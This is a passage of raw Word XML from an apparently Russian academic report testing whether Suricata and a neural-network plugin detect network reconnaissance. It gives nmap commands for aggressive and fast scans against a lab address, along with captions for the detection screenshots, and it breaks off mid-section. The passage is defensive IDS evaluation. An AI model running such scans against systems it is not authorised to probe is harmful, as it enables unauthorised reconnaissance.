        <w:t xml:space="preserve">. Для каждого </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA46A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">сценария фиксировались результаты работы как классической </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA46A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA46A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, так и нейросетевого плагина. Результаты каждого теста приведены ниже.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Перед проведением тестов была выполнена актуализация базы сигнатур командой </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>suricata-update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B7A2E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, что обеспечило загрузку актуального набора правил</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277471F2" w14:textId="77777777" w:rsidR="00A7269E" w:rsidRDefault="00A7269E" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1295E31F" w14:textId="4B7E8B16" w:rsidR="008E0171" w:rsidRPr="00A7269E" w:rsidRDefault="00A7269E" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7269E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.1 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00A7269E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Тест 1. Сетевая разведка </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50ED290B" w14:textId="2D60157B" w:rsidR="00A7269E"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w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1654">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>етевая разведка является первым этапом любой целенаправленной атаки согласно матрице MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1654">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Злоумышленник сканирует целевой узел с целью выявления открытых портов, запущенных сервисов и версий программного обеспечения. Для затруднения обнаружения атакующие применяют различные режимы сканирования — от агрессивного до максимально скрытного.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> В связи с эти было решено проверить все основные </w:t>
      </w:r>
      <w:r w:rsidR="00A7269E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>режимы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> сканирования</w:t>
      </w:r>
      <w:r w:rsidR="00A7269E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A7269E" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>такие как: агрессивный скан,</w:t>
      </w:r>
      <w:r w:rsidR="00A7269E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>быстрый скан, тихий скан и скан популярных портов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A6CD81" w14:textId="315B4641" w:rsidR="008E0171" w:rsidRDefault="00A7269E" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.4.1.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00DD1654">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Режим </w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00DD1654">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>— агрессивный скан (определение ОС, версий сервисов, трассировка):</w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A5D9DF" w14:textId="77777777" w:rsidR="00D70BA9" w:rsidRDefault="00D70BA9" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45AD3781" w14:textId="77777777" w:rsidR="002A0DB3" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T5 -A 192.168.0.104</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A8FB92" w14:textId="77777777" w:rsidR="00D70BA9" w:rsidRDefault="00D70BA9" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1726A0F6" w14:textId="25AEBDEE" w:rsidR="008E0171" w:rsidRPr="005A28AB"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Обнаружение такого режима показано на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF9C1B4"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6B88E30A" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005930DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64339D36" wp14:editId="7C059891">
            <wp:extent cx="6112548" cy="2667000"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="128635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5120" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6137239" cy="2677773"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CA4422" w14:textId="1334F788" w:rsidR="004961D0" w:rsidRPr="00086FB2" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="415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961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="005930DB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Обнаружение а</w:t>
      </w:r>
      <w:r w:rsidRPr="00911697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>грессивно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>го</w:t>
      </w:r>
      <w:r w:rsidRPr="00911697">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> сканировани</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229C9B9A" w14:textId="4791E896" w:rsidR="008E0171" w:rsidRDefault="000A1CD6" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.4.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00DD1654">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Режим </w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00DD1654">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — быстрый скан (наиболее распространённые порты):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CA0C3C" w14:textId="77777777" w:rsidR="005D6C1B" w:rsidRDefault="005D6C1B" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48507730" w14:textId="51F959AF" w:rsidR="002A0DB3" w:rsidRDefault="008E0171" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EB463F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -F 192.168.0.104</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE0868D" w14:textId="77777777" w:rsidR="005D6C1B" w:rsidRDefault="005D6C1B" w:rsidP="00D70BA9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D0A2BFF" w14:textId="39D4384C"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Обнаружение такого режима показано на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A46D9A9" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00DD1654" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B190455" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79E91569" wp14:editId="4E7B77B3">
            <wp:extent cx="5985573" cy="2457450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="740946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46681" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId38"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5990092" cy="2459305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C805DA" w14:textId="69AFE5E9" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="005D6C1B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD1654">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00DD1654">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Обнаружение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>быстрого сканирования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29952EEC"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59D94337" w14:textId="77777777" w:rsidR="005D6C1B" w:rsidRDefault="000A1CD6" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.4.1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00534DFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Режим </w:t>
      </w:r>
      <w:r w:rsidR="008E0171">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00534DFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
